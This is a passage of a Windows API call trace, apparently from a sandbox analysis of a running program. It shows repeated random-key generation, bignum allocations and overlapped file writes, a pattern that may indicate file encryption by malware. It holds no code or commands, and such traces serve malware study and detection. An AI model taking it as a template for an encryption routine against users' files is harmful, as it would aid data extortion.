(_Block=0x1fa90b8) [0169.747] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.747] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.761] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.761] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.761] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.762] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.762] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.762] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.762] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.762] free (_Block=0x3e305b8) [0169.762] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.762] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.763] free (_Block=0x1fa91d0) [0169.763] free (_Block=0x1fa2ed8) [0169.763] free (_Block=0x1fa90b8) [0169.763] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0169.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.773] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x5f30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0169.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.819] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.819] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.819] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.819] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.820] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.820] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.820] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.820] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.820] free (_Block=0x3e305b8) [0169.820] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.820] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.821] free (_Block=0x1fa91d0) [0169.821] free (_Block=0x1fa2ed8) [0169.821] free (_Block=0x1fa90b8) [0169.821] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0169.824] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.855] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x50b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0169.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.892] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0169.893] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.904] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.904] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.904] free (_Block=0x3e305b8) [0169.904] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.905] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.905] free (_Block=0x1fa91d0) [0169.905] free (_Block=0x1fa2ed8) [0169.905] free (_Block=0x1fa90b8) [0169.905] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0169.907] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.919] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.920] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.920] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.921] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.921] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.921] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.921] free (_Block=0x3e305b8) [0169.921] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.921] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0169.922] free (_Block=0x1fa91d0) [0169.922] free (_Block=0x1fa2ed8) [0169.922] free (_Block=0x1fa90b8) [0169.922] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.927] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x5e80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0169.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0169.983] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0169.984] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0169.985] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0169.985] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0169.985] free (_Block=0x3e305b8) [0169.985] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0169.985] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0169.985] free (_Block=0x1fa91d0) [0169.985] free (_Block=0x77d7a8) [0169.986] free (_Block=0x1fa90b8) [0169.986] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0169.986] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0170.118] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7d84, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0171.498] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0171.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0171.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0171.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0171.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0171.816] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0171.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0171.819] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0171.819] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0171.819] free (_Block=0x3e305b8) [0171.819] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0171.819] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0171.820] free (_Block=0x1fa91d0) [0171.820] free (_Block=0x1fa2ed8) [0171.820] free (_Block=0x1fa90b8) [0171.820] WriteFile (in: hFile=0xec, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0171.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0171.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0171.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0171.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0171.825] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0171.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0171.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0171.825] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0171.825] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0171.826] free (_Block=0x3e305b8) [0171.826] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0171.826] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0171.826] free (_Block=0x1fa91d0) [0171.826] free (_Block=0x1fa2ed8) [0171.826] free (_Block=0x1fa90b8) [0171.826] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0171.826] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.120] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x7c10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0172.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0172.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.189] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0172.189] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0172.189] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0172.189] free (_Block=0x3e305b8) [0172.189] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0172.189] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0172.190] free (_Block=0x1fa91d0) [0172.190] free (_Block=0x1fa2ed8) [0172.190] free (_Block=0x1fa90b8) [0172.190] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0172.191] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.263] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1a6c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0172.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.281] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.281] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0172.281] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.281] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0172.282] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0172.282] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0172.282] free (_Block=0x3e305b8) [0172.282] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0172.282] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0172.282] free (_Block=0x1fa91d0) [0172.282] free (_Block=0x1fa2ed8) [0172.282] free (_Block=0x1fa90b8) [0172.282] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0172.283] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.383] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1a7e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0172.384] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.436] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1a7e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0172.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.450] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0172.451] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.451] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.451] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0172.452] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0172.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0172.452] free (_Block=0x3e305b8) [0172.452] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0172.452] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0172.452] free (_Block=0x1fa91d0) [0172.452] free (_Block=0x1fa2ed8) [0172.452] free (_Block=0x1fa90b8) [0172.452] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0172.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.521] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.521] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0172.521] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.522] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0172.522] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0172.522] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0172.522] free (_Block=0x3e305b8) [0172.522] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0172.522] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0172.523] free (_Block=0x1fa91d0) [0172.523] free (_Block=0x1fa2ed8) [0172.523] free (_Block=0x1fa90b8) [0172.523] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0172.524] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0172.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0172.533] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0172.533] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0172.533] free (_Block=0x3e305b8) [0172.534] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0172.534] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0172.534] free (_Block=0x1fa91d0) [0172.534] free (_Block=0x1fa2ed8) [0172.534] free (_Block=0x1fa90b8) [0172.534] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0172.534] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.600] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x30410, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0172.603] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0172.632] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.632] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0172.632] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0172.632] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0172.632] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: 